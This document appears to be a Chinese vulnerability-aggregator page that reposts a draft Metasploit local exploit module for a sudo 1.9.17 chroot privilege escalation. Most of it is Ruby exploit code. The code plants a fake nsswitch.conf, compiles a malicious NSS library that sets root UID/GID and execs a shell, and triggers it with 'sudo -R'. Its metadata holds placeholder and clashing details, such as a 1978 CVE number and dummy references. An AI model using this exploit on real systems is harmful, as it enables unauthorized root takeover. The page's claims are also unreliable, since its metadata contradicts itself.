Sudo Chroot 1917 Privilege Escalation

漏洞信息

漏洞名称: Sudo Chroot 1.9.17 Privilege Escalation

漏洞编号:

  • CVE: CVE-1978-1234

漏洞类型: 权限提升

漏洞等级: 高危

漏洞描述: 该漏洞影响的是Linux系统中的Sudo命令,具体版本为1.9.17。Sudo是一个广泛使用的程序,允许系统管理员授权特定用户以root或其他用户的身份运行某些命令,而无需知道root密码。这种功能在企业级服务和多用户系统中尤为重要。漏洞的根源在于Sudo的chroot功能中存在的一个缺陷,攻击者可以利用这一缺陷在特定条件下绕过安全限制,执行任意代码,从而获得root权限。这种漏洞的利用不需要用户交互,且可以自动化执行,因此对系统安全构成严重威胁。成功利用此漏洞的攻击者可以完全控制系统,执行任意命令,访问敏感数据,甚至破坏系统稳定性。由于Sudo的广泛使用,这一漏洞的影响范围非常广泛,需要系统管理员及时应用补丁以防止潜在的攻击。

产品名称: Sudo

影响版本: 1.9.17

来源: https://github.com/rapid7/metasploit-framework/blob/a9a701f053f2bdaff372e61e7c25b669f84eacf8/modules%2Fexploits%2Flinux%2Flocal%2Fsudo_chroot_cve_2025_32463.rb

类型: rapid7/metasploit-framework:github issues

POC详情

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
165
166
167
168
169
170
171
172
173
174
175
176
177
178
179
180
181
182
183
184
185
186
187
188
189
190
191
192
193
194
195
196

##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

###
#
# This exploit sample shows how an exploit module could be written to exploit
# a bug in a command on a linux computer for priv esc.
#
###
class MetasploitModule < Msf::Exploit::Local
  Rank = NormalRanking # https://docs.metasploit.com/docs/using-metasploit/intermediate/exploit-ranking.html

  include Msf::Post::File
  include Msf::Post::Linux::Priv
  include Msf::Post::Linux::Kernel
  include Msf::Post::Linux::System
  include Msf::Post::Linux::Compile
  include Msf::Exploit::EXE
  include Msf::Exploit::FileDropper

  prepend Msf::Exploit::Remote::AutoCheck


  def initialize(info = {})
    super(
      update_info(
        info,
        # The Name should be just like the line of a Git commit - software name,
        # vuln type, class. Preferably apply
        # some search optimization so people can actually find the module.
        # We encourage consistency between module name and file name.
        'Name' => 'Sudo Chroot 1.9.17 Privilege Escalation',
        'Description' => %q{
          This exploit module illustrates how a vulnerability could be exploited
          in an linux command for priv esc.
        },
        'License' => MSF_LICENSE,
        # The place to add your name/handle and email.  Twitter and other contact info isn't handled here.
        # Add reference to additional authors, like those creating original proof of concepts or
        # reference materials.
        # It is also common to comment in who did what (PoC vs metasploit module, etc)
        'Author' => [
          'h00die <mike@stcyrsecurity.com>', # msf module
          'researcher' # original PoC, analysis
        ],
        'Platform' => [ 'linux' ],
        # from underlying architecture of the system.  typically ARCH_X64 or ARCH_X86, but the exploit
        # may only apply to say ARCH_PPC or something else, where a specific arch is required.
        # A full list is available in lib/msf/core/payload/uuid.rb
        'Arch' => [ ARCH_CMD ],
        # What types of sessions we can use this module in conjunction with.  Most modules use libraries
        # which work on shell and meterpreter, but there may be a nuance between one of them, so best to
        # test both to ensure compatibility.
        'SessionTypes' => [ 'shell' ],
        'Targets' => [[ 'Auto', {} ]],
        # from lib/msf/core/module/privileged, denotes if this requires or gives privileged access
        # since privilege escalation modules typically result in elevated privileges, this is
        # generally set to true
        'Privileged' => true,
        'References' => [
          [ 'OSVDB', '12345' ],
          [ 'EDB', '12345' ],
          [ 'URL', 'http://www.example.com'],
          [ 'CVE', '1978-1234']
        ],
        'DisclosureDate' => '2023-11-29',
        # Note that DefaultTarget refers to the index of an item in Targets, rather than name.
        # It's generally easiest just to put the default at the beginning of the list and skip this
        # entirely.
        'DefaultTarget' => 0,
        # https://docs.metasploit.com/docs/development/developing-modules/module-metadata/definition-of-module-reliability-side-effects-and-stability.html
        'Notes' => {
          'Stability' => [],
          'Reliability' => [],
          'SideEffects' => []
        }
      )
    )


    # force exploit is used to bypass the check command results
    register_advanced_options [
      OptString.new('WritableDir', [ true, 'A directory where we can write files', '/tmp' ]),

    ]
  end



  def check

    return CheckCode::Appears("Vulnerable app version detected")
    # Check the kernel version to see if its in a vulnerable range
    # we guard this because some distros have funky kernel versions https://github.com/rapid7/metasploit-framework/issues/19812
#    release = kernel_release
#    begin
#      if Rex::Version.new(release.split('-').first) > Rex::Version.new('4.14.11') ||
#         Rex::Version.new(release.split('-').first) < Rex::Version.new('4.0')
#        return CheckCode::Safe("Kernel version #{release} is not vulnerable")
#      end
#    rescue ArgumentError => e
#      return CheckCode::Safe("Error determining or processing kernel release (#{release}) into known format: #{e}")
#    end
#    vprint_good "Kernel version #{release} appears to be vulnerable"
#
#    # Check the app is installed and the version, debian based example
#    package = cmd_exec('dpkg -l example | grep \'^ii\'')
#    if package&.include?('1:2015.3.14AR.1-1build1')
#      return CheckCode::Appears("Vulnerable app version #{package} detected")
#    end
#
#    CheckCode::Safe("app #{package} is not vulnerable")
  end

  #
  # The exploit method drops a payload file to the system, then either compiles and runs
  # or just runs the exploit on the system.
  #
  def exploit
    # Check if we're already root
    if !datastore['ForceExploit'] && is_root?
      fail_with Failure::None, 'Session already has root privileges. Set ForceExploit to override'
    end
    
    payload_file = rand_text_alphanumeric(5..10)

    temp_dir = "/#{datastore['WritableDir']}/#{rand_text_alphanumeric(5..10)}"
    
    mkdir(temp_dir)
    
    cd(temp_dir)
    
    cmd_exec("mkdir -p woot/etc libnss_")
    cmd_exec(%<echo "passwd: /woot1337" \> woot/etc/nsswitch.conf>)
    cmd_exec("cp /etc/group woot/etc")

    exploit_code = %Q<
    #include <stdlib.h>
    #include <unistd.h>

    __attribute__((constructor))
    void woot(void) {
      setreuid(0,0);          /* change to UID 0 */
      setregid(0,0);          /* change  to GID 0 */
      chdir("/");             /* exit from chroot */
      execve("/tmp/pwned",NULL,NULL); /* root shell */
    }>

    upload_and_compile("#{temp_dir}/libnss_/woot1337.so.2", exploit_code, "-shared -fPIC -Wl,-init,woot")

    cmd_exec("sudo -R woot woot")

    timeout = 30
    print_status 'Launching exploit...'
    output = cmd_exec "command", nil, timeout
    output.each_line { |line| vprint_status line.chomp }

    #    # Make sure we can write our exploit and payload to the local system
#    unless writable? base_dir
#      fail_with Failure::BadConfig, "#{base_dir} is not writable"
#    end
#
#    # Upload exploit executable, writing to a random name so AV doesn't have too easy a job
#    executable_name = ".#{rand_text_alphanumeric(5..10)}"
#    executable_path = "#{base_dir}/#{executable_name}"
#    if live_compile?
#      vprint_status 'Live compiling exploit on system...'
#      upload_and_compile executable_path, strip_comments(exploit_data('example.c'))
#      rm_f "#{executable_path}.c"
#    else
#      vprint_status 'Dropping pre-compiled exploit on system...'
#      upload_and_chmodx executable_path, exploit_data('example')
#    end
#
#    # register the file for automatic cleanup
#    register_files_for_cleanup(executable_path)
#
#    # Upload payload executable
#    payload_path = "#{base_dir}/.#{rand_text_alphanumeric(5..10)}"
#    upload_and_chmodx payload_path, generate_payload_exe
#    # register payload for automatic cleanup
#    register_files_for_cleanup(payload_path)
#
#    # Launch exploit with a timeout.  We also have a vprint_status so if the user wants all the
#    # output from the exploit being run, they can optionally see it
#    timeout = 30
#    print_status 'Launching exploit...'
#    output = cmd_exec "echo '#{payload_path} & exit' | #{executable_path}", nil, timeout
#    output.each_line { |line| vprint_status line.chomp }
  end
end


Github Poc
#rapid7/metasploit-framework:github issues #权限提升
Sudo Chroot 1917 Privilege Escalation
http://example.com/2025/07/10/github_3687428616/
作者
lianccc
发布于
2025年7月10日
许可协议